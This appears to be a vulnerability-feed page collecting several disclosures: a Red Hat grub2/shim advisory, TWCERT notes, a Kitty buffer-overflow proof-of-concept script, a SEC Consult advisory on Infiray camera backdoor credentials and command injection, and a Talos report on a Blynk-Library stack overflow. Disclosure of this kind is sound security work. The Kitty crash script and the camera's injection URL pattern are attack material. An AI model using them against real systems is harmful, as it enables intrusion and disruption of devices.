Red Hat Security Advisory 2022-5098-01 - The grub2 packages provide version 2 of the Grand Unified Boot Loader, a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices. The shim package contains a first-stage UEFI boot loader that handles chaining to a trusted full boot loader under secure boot environments. Issues addressed include buffer overflow, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: grub2, mokutil, and shim security update  
Advisory ID:       RHSA-2022:5098-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5098  
Issue date:        2022-06-16  
CVE Names:         CVE-2021-3695 CVE-2021-3696 CVE-2021-3697   
                   CVE-2022-28733 CVE-2022-28734 CVE-2022-28735   
                   CVE-2022-28736 CVE-2022-28737   
=====================================================================

1. Summary:

An update for grub2, mokutil, and shim is now available for Red Hat  
Enterprise Linux 8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, noarch, ppc64le, x86_64

3. Description:

The grub2 packages provide version 2 of the Grand Unified Boot Loader  
(GRUB), a highly configurable and customizable boot loader with modular  
architecture. The packages support a variety of kernel formats, file  
systems, computer architectures, and hardware devices.

The shim package contains a first-stage UEFI boot loader that handles  
chaining to a trusted full boot loader under secure boot environments.

Security Fix(es):

* grub2: Integer underflow in grub_net_recv_ip4_packets (CVE-2022-28733)

* grub2: Crafted PNG grayscale images may lead to out-of-bounds write in  
heap (CVE-2021-3695)

* grub2: Crafted PNG image may lead to out-of-bound write during huffman  
table handling (CVE-2021-3696)

* grub2: Crafted JPEG image can lead to buffer underflow write in the heap  
(CVE-2021-3697)

* grub2: Out-of-bound write when handling split HTTP headers  
(CVE-2022-28734)

* grub2: shim_lock verifier allows non-kernel files to be loaded  
(CVE-2022-28735)

* grub2: use-after-free in grub_cmd_chainloader() (CVE-2022-28736)

* shim: Buffer overflow when loading crafted EFI images (CVE-2022-28737)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1991685 - CVE-2021-3695 grub2: Crafted PNG grayscale images may lead to out-of-bounds write in heap  
1991686 - CVE-2021-3696 grub2: Crafted PNG image may lead to out-of-bound write during huffman table handling  
1991687 - CVE-2021-3697 grub2: Crafted JPEG image can lead to buffer underflow write in the heap  
2083339 - CVE-2022-28733 grub2: Integer underflow in grub_net_recv_ip4_packets  
2090463 - CVE-2022-28734 grub2: Out-of-bound write when handling split HTTP headers  
2090857 - CVE-2022-28735 grub2: shim_lock verifier allows non-kernel files to be loaded  
2090899 - CVE-2022-28737 shim: Buffer overflow when loading crafted EFI images  
2092613 - CVE-2022-28736 grub2: use-after-free in grub_cmd_chainloader()

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
grub2-2.02-87.el8_1.10.src.rpm  
mokutil-0.3.0-9.el8_1.1.src.rpm  
shim-15.6-1.el8.src.rpm

aarch64:  
grub2-debuginfo-2.02-87.el8_1.10.aarch64.rpm  
grub2-debugsource-2.02-87.el8_1.10.aarch64.rpm  
grub2-efi-aa64-2.02-87.el8_1.10.aarch64.rpm  
grub2-efi-aa64-cdboot-2.02-87.el8_1.10.aarch64.rpm  
grub2-tools-2.02-87.el8_1.10.aarch64.rpm  
grub2-tools-debuginfo-2.02-87.el8_1.10.aarch64.rpm  
grub2-tools-extra-2.02-87.el8_1.10.aarch64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_1.10.aarch64.rpm  
grub2-tools-minimal-2.02-87.el8_1.10.aarch64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_1.10.aarch64.rpm  
mokutil-0.3.0-9.el8_1.1.aarch64.rpm  
mokutil-debuginfo-0.3.0-9.el8_1.1.aarch64.rpm  
mokutil-debugsource-0.3.0-9.el8_1.1.aarch64.rpm  
shim-aa64-15.6-1.el8.aarch64.rpm

noarch:  
grub2-common-2.02-87.el8_1.10.noarch.rpm  
grub2-efi-aa64-modules-2.02-87.el8_1.10.noarch.rpm  
grub2-efi-ia32-modules-2.02-87.el8_1.10.noarch.rpm  
grub2-efi-x64-modules-2.02-87.el8_1.10.noarch.rpm  
grub2-pc-modules-2.02-87.el8_1.10.noarch.rpm  
grub2-ppc64le-modules-2.02-87.el8_1.10.noarch.rpm

ppc64le:  
grub2-debuginfo-2.02-87.el8_1.10.ppc64le.rpm  
grub2-debugsource-2.02-87.el8_1.10.ppc64le.rpm  
grub2-ppc64le-2.02-87.el8_1.10.ppc64le.rpm  
grub2-tools-2.02-87.el8_1.10.ppc64le.rpm  
grub2-tools-debuginfo-2.02-87.el8_1.10.ppc64le.rpm  
grub2-tools-extra-2.02-87.el8_1.10.ppc64le.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_1.10.ppc64le.rpm  
grub2-tools-minimal-2.02-87.el8_1.10.ppc64le.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_1.10.ppc64le.rpm

x86_64:  
grub2-debuginfo-2.02-87.el8_1.10.x86_64.rpm  
grub2-debugsource-2.02-87.el8_1.10.x86_64.rpm  
grub2-efi-ia32-2.02-87.el8_1.10.x86_64.rpm  
grub2-efi-ia32-cdboot-2.02-87.el8_1.10.x86_64.rpm  
grub2-efi-x64-2.02-87.el8_1.10.x86_64.rpm  
grub2-efi-x64-cdboot-2.02-87.el8_1.10.x86_64.rpm  
grub2-pc-2.02-87.el8_1.10.x86_64.rpm  
grub2-tools-2.02-87.el8_1.10.x86_64.rpm  
grub2-tools-debuginfo-2.02-87.el8_1.10.x86_64.rpm  
grub2-tools-efi-2.02-87.el8_1.10.x86_64.rpm  
grub2-tools-efi-debuginfo-2.02-87.el8_1.10.x86_64.rpm  
grub2-tools-extra-2.02-87.el8_1.10.x86_64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_1.10.x86_64.rpm  
grub2-tools-minimal-2.02-87.el8_1.10.x86_64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_1.10.x86_64.rpm  
mokutil-0.3.0-9.el8_1.1.x86_64.rpm  
mokutil-debuginfo-0.3.0-9.el8_1.1.x86_64.rpm  
mokutil-debugsource-0.3.0-9.el8_1.1.x86_64.rpm  
shim-ia32-15.6-1.el8.x86_64.rpm  
shim-x64-15.6-1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-3695  
https://access.redhat.com/security/cve/CVE-2021-3696  
https://access.redhat.com/security/cve/CVE-2021-3697  
https://access.redhat.com/security/cve/CVE-2022-28733  
https://access.redhat.com/security/cve/CVE-2022-28734  
https://access.redhat.com/security/cve/CVE-2022-28735  
https://access.redhat.com/security/cve/CVE-2022-28736  
https://access.redhat.com/security/cve/CVE-2022-28737  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqtvZtzjgjWX9erEAQiqow/+IcUOf0BCPaIaF7Wfx3FzqT1UPNeHz7oe  
OIN8sDIpQAQRnNC7abh4Y10xZY/iBq9KzGMllLI95J680QeAsfRGHI/FOuAjE8mH  
dFDFjJPf368OCBlucD4ER3bOh/Z8qmCtiL+udaiXI3tOn9v2jCyAZU5l6XLkUMmM  
rwTSNejOkLFlZZSbOvsj7HPGovvSRwaeWyP8HSsB/x8ZxATV9hnWFxgzPShdc4Av  
Guo+e5Ox5kCsYUMx+JaLTB5f0r84Ww/JF/yC54+7GaJjKqfOn/fBZve6x8EpMlzH  
p6hiYoc0H3w4Q8dt64Dy84YBxd2lab1yf78P6wnfIc8DbJLk8WEiGFHXgztUcoSF  
zPHzy3KvdRjm0VbsHv6zos+vw6xk853lk7x1VC+hfzwX8k+v6qjLQVWe6o0Bgbr1  
uddxC4FS8q9IimrBIOdQMFgAB2EHlkQ6+rtAMEnrQl7FNuc+01bfqAzlSxST5whA  
tmDHTn+yfAq8IZxme9fUB0IWPE6B7X9BuFOEUJXoDA7a32XNBh7rxZMKM8Qvik2m  
f6wFbeOMUP1qH5aI5q7w7gjDALZYCjkm6G4PZIzPe7b5d776oVTi6LVLrNqoF3iS  
YSoJcfgbAD/z4vhD7+v8jchsKajLhfU6cg1Y55tCaWE+ChZX5gxxg9np2RimQUKg  
OSDo4rO0XWs=  
=U5j2  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5098-01

Realtek USB driver has a buffer overflow vulnerability due to insufficient parameter length verification in the API function. An unauthenticated LAN attacker can exploit this vulnerability to disrupt services.

*   隱私權及安全政策
*   使用說明

Copyright © TWCERT/CC 台灣電腦網路危機處理暨協調中心 1998-2022

最佳瀏覽解析度為1024x768以上  
台灣電腦網路危機處理暨協調中心 1998-2022

更新日期：_2022-06-20_累計瀏覽人次：_8553173_

CVE-2022-21742: Realtek USB FE/1GbE/2.5GbE/5GbE NIC Family - Buffer Overflow

NHI’s health insurance web service component has insufficient validation for input string length, which can result in heap-based buffer overflow attack. A remote attacker can exploit this vulnerability to flood the memory space reserved for the program, in order to terminate service without authentication, which requires a system restart to recover service.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202112007

CVE ID

CVE-2021-45918

CVSS

7.5 (High)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

影響產品

健保卡網路服務註冊網站供下載受影響版本之平台與相對應MD5 HASH：  
Windows: Setup.zip MD5驗證碼：515BE7DE5BCE446177FEE8A6E0665093  
Mac: NHI.Card.Mac.pkg.zip MD5驗證碼： 42fcc36541e716e23de77d5f325b186a  
Linux(Ubuntu): mLNHIICC\_Setup.Ubuntu.zip MD5驗證碼： 52EACB7CA2B4D0A5A869DF01079BF4D6  
Linux(Fedora): mLNHIICC\_Setup.fedora.zip MD5驗證碼： 52EACB7CA2B4D0A5A869DF01079BF4D6

問題描述

健保卡網路服務元件之特定函式未驗證輸入的字串長度，導致預先保留的記憶體Buffer不足，造成Heap-based Buffer Overflow漏洞，遠端攻擊者不須權限，即可利用該漏洞導致終止服務，須重啟服務才能恢復。

解決方法

至健保卡網路服務註冊網之下載點下載最新版本

漏洞通報者

Yu-Hsiang Lin

公開日期

2022-06-20

CVE-2021-45918: 健保卡網路服務元件 - Heap-based Buffer Overflow

Red Hat Security Advisory 2022-5002-01 - The Advanced Virtualization module provides the user-space component for running virtual machines that use KVM in environments managed by Red Hat products. Issues addressed include buffer overflow, integer overflow, and memory leak vulnerabilities.

Red Hat Security Advisory 2022-5002-01

Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.

    # Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow# Discovered by: Yehia Elghaly# Discovered Date: 2022-06-08# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe# Tested Version: 0.76.0.8# Vulnerability Type: Buffer Overflow# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64# Description: Kitty 0.76.0.8 Stack Buffer Overflow# Steps to reproduce:# 1. - Run the python script and it will create exploit.txt file.# 3. - Kitty 0.76.0.8# 4. - Sessions -> Save# 5. - Paste the characters of txt to Saved/Sessions then click save# 6. - Crashed# Note: ECX Overwwrite #!/usr/bin/pythonexploit = 'A' * 2091try:     file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC not created")

Kitty 0.76.0.8 Stack Buffer Overflow

Infiray IRAY-A8Z3 thermal camera version 1.0.957 suffers from hardcoded web credential, authenticated remote code execution, buffer overflow, lack of password for root, and outdated software component vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220607-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Infiray IRAY-A8Z3 thermal camera  
  vulnerable version: V1.0.957  
       fixed version: None  
          CVE number: CVE-2022-31208, CVE-2022-31209, CVE-2022-31210,  
                      CVE-2022-31211  
              impact: Critical  
            homepage: http://www.infiray.com/  
               found: 2021-02  
                  by: S. Robertz (Office Vienna)  
                      F. Lienhart  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"IRay Technology Co., Ltd. is a wholly-owned subsidiary of Raytron Technology  
Co., Ltd. (SSE: 688002). As a high-tech enterprise, IRay Technology develops  
and manufactures infrared FPA detectors, thermal imaging modules, and other  
products, with completely independent intellectual property rights. We are  
committed to providing global customers with professional thermal imaging  
products and solutions. The main products include IRFPA detectors, thermal  
imaging cores, and terminal products for application."

Source: http://www.infiray.com/about.html

Business recommendation:  
------------------------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

SEC Consult recommends to perform a thorough security review of these  
products conducted by security professionals to identify and resolve all  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The binary file "/usr/local/sbin/webproject/set_param.cgi" contains hardcoded  
credentials to the web application. As these accounts cannot be deactivated  
or change their passwords, they are considered to be backdoor accounts.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The webserver contains an endpoint that can execute arbitrary commands by  
manipulating the "cmd_string" URL parameter. The user can login using one  
of the backdoor accounts from issue 1.

3) Potential Buffer Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow by calling strcpy() without  
checking the string length beforehand.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera offers a shell through a telnet connection. The root user does not  
require a password per default. Thus, anyone on the local network can  
execute arbitrary commands as root on the camera.

5) Multiple Outdated Software Components  
Multiple outdated software components containing vulnerabilities were found by  
the IoT Inspector (ONEKEY) firmware analysis platform.

Proof of concept:  
-----------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The following cgi program will be executed during the login process:

http://<my_ip>:8080/set_param.cgi?&group_tag=hash_param_bridge  
&set_cmd=loading&length=35&name=<user>&password=<password>&access=0  
&0.3543773172371312

The following de-compilation shows the code flow with the hardcoded passwords:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The authentication works by comparing the URL supplied username with the string  
"[removed]". Afterwards it will compare the password parameter to "[removed]" as well. If both  
string parameters match, a message will be removed from the messaging queue.  
Otherwise the function will just return. The same comparison holds for the admin account.

Furthermore, string comparisons are made without checking the case. Hence,  
drastically improving the chances of brute-force attacks.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The web application offers an option to view the device log. Opening following URL while  
logged in as admin (e.g. with hardcoded password from section 1) will trigger the request:

http://<my_ip>:8080/cmd.cgi?cmd_tag=cmd_passthrough&cmd_string=[removed]

By changing the "cmd_string" parameter, arbitrary commands can be executed with  
the rights of the webserver (www-data). The de-compiled code can be seen in following  
snippet:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The "cmd_string" parameter is directly passed into popen() and hence executed.

3) Potential Buffer-Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow vulnerability:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
A pointer to the "next_url" parameter is supplied. A buffer of 64 bytes is  
allocated and the parameter value copied to it without checking the string  
length. Hence, a "next_url" parameter with more than 64 bytes could be  
supplied in order to overflow the buffer.  
Please note that this vulnerability is only based on firmware analysis and thus  
was not tested in a live scenario.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera has a telnetd server running on port 23 per default. The root  
password is empty. If the telnet port is exposed to the internet, an attacker  
could easily connect to the device and gain root access. The telnet server  
cannot be deactivated and the root password cannot be changed through the  
web interface.

5) Multiple Outdated Software Components  
IoT Inspector (ONEKEY) recognized multiple outdated software components  
with known vulnerabilities:

BusyBox 1.25.0:                                  6 CVEs  
curl 7.54.0:                                    13 CVEs  
Dnsmasq 2.76:                                    9 CVEs  
lighttpd 1.4.41:                                 2 CVEs  
Linux Kernel 3.10.104:                        1004 CVEs  
hostapd 2.5:                                    22 CVEs  
wpa_supplicant 2.5-devel_rtw_r17190.20160415:   12 CVEs

Vulnerable / tested versions:  
-----------------------------  
The following product/firmware version has been tested:  
* Infiray IRAY-A8Z3 V1.0.957

It has to be assumed that further products or firmware versions are affected as well.

Vendor contact timeline:  
------------------------  
2021-02-24: Contacting vendor through email address found on their website  
             (sales@infiray.com)  
2021-03-11: Contacted vendor again through sales@infiray.com  
2021-04-12: Contacting vendor through sales@infiray.com and InfiRay.CS@iraytek.com  
2021-04-12: Response from Sales Director, does not understand what to do with the information  
2021-04-12: Requesting a contact to the product owner or developer  
2021-04-13: Sending unencrypted security advisory to two provided email addresses.  
2021-04-29: Requesting status from vendor, no reply.  
2022-04-05: Requested status from vendor, no reply.  
2022-06-07: Release of security advisory.

Solution:  
---------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz, F. Lienhart / @2022

Infiray IRAY-A8Z3 1.0.957 Code Execution / Overflow / Hardcoded Credentials

Zyxel firewalls, AP controllers, and APs suffer from buffer overflow, format string, and command injection vulnerabilities.

Zyxel Buffer Overflow / Format String / Command Injection

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

CVE-2022-2125

The PPM reader in libjpeg-turbo through 2.0.90 mishandles use of tjLoadImage for loading a 16-bit binary PPM file into a grayscale buffer and loading a 16-bit binary PGM file into an RGB buffer. This is related to a heap-based buffer overflow in the get_word_rgb_row function in rdppm.c.

CVE-2021-46822: libjpeg-turbo rdppm.c denial of service Vulnerability Report

A stack-based buffer overflow vulnerability exists in the BlynkConsole.h runCommand functionality of Blynk -Library v1.0.1. A specially-crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in the BlynkConsole.h runCommand functionality of Blynk -Library v1.0.1. A specially-crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**Tested Versions**

Blynk -Library v1.0.1

**Product URLs**

Blynk-Library - https://github.com/blynkkk/blynk-library

**CVSSv3 Score**

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

Blynk-Library is a small library for connecting more than 400 different embedded device models into a private or enterprise Blynk-Server instance. According to the git repository, it is the “most popular internet-of-things platform for connecting any hardware to the cloud.”

The Blynk-Library manages different types of commands. If some specific commands are issued to the device the library goes through a function called runCommand to parse the request and perform the operation, if the command is supported. The runCommand function:

    ProcessResult runCommand(char* cmd) {
            char* argv[8] = { 0, };                                                                         [1]
            int argc = split_argv(cmd, argv);                                                               [2]
            if (argc <= 0) {
            [...]
    

The first thing this function does is split the provided command into different arguments. At [2] the function split_argv is called. This function replaces each spaces with a null terminator; this will separate the command string into multiple strings. The pointers of each created string are placed in each position of the char pointer array at [1].

The split_argv function does not know how long the runCommand’s argv buffer is, because the received command can have more than 7 spaces. This means that the split_argv function can overflow the stack buffer based on the received command. This can lead to overwriting the return address of the runCommand function with a value that points to the data of the cmd buffer, based on the architecture. This issue can lead to arbitrary command execution.

For example, the stack dump at [2] looks like:

    $ x/20dwx $sp
    0x20007e08:	0x20001eb8	0x2000067c	0x20007e18	0x00000000
    0x20007e18:	0x00000000	0x00000000	0x00000000	0x00000000
    0x20007e28:	0x00000000	0x00000000	0x00000000	0x00017c01
    0x20007e38:	0x00000024	0x000131f1	0x00000024	0x00000018
    0x20007e48:	0x20007e50	0x00006687	0x20007f04	0x20007f28
    

At 0x20007e14 starts the argv buffer. After 8 elements are parsed, by the split_argv function, the same portion of memory looks like this:

    $ x/20dwx 0x20007e08
    0x20007e08:	0x20001eb8	0x2000067c	0x20007e18	0x20001eb8
    0x20007e18:	0x20001eba	0x20001ebc	0x20001ebe	0x20001ec0
    0x20007e28:	0x20001ec2	0x20001ec4	0x20001ec6	0x00017c01
    0x20007e38:	0x00000024	0x000131f1	0x00000024	0x00000018
    0x20007e48:	0x20007e50	0x00006687	0x20007f04	0x20007f28
    

The value at 0x20007e4c, 0x00006687, is the return address of the function runCommand:

    $ x/3i 0x00006687
    0x6687 <BlynkWidgetWriteInternalPinDBG(BlynkReq&, BlynkParam const&)+110>:	adds	r3, r7, r6
    0x6689 <BlynkWidgetWriteInternalPinDBG(BlynkReq&, BlynkParam const&)+112>:	movs	r0, r3
    0x668b <BlynkWidgetWriteInternalPinDBG(BlynkReq&, BlynkParam const&)+114>:	bl	0x131d6 <arduino::String::~String()>
    

At some point one of the arguments parsed will overwrite that return address:

    $x/20dwx 0x20007e08
    0x20007e08:	0x20001eb8	0x2000067c	0x20007e18	0x20001eb8
    0x20007e18:	0x20001eba	0x20001ebc	0x20001ebe	0x20001ec0
    0x20007e28:	0x20001ec2	0x20001ec4	0x20001ec6	0x20001ec8
    0x20007e38:	0x20001eca	0x20001ecc	0x20001ece	0x20001ed0
    0x20007e48:	0x20001ed2	0x20001ed5	0x00000000	0x20007f28
    

And at 0x20001ed5 there are fully controllable data, so if the architecture is such that the parsed argument is located in a memory portion that is executable, that memory will eventually be executed.

**Timeline**

2022-06-08 - Vendor Disclosure  
2022-06-15 - Public Release  

Discovered by Francesco Benvenuto of Cisco Talos.

Tag

#buffer_overflow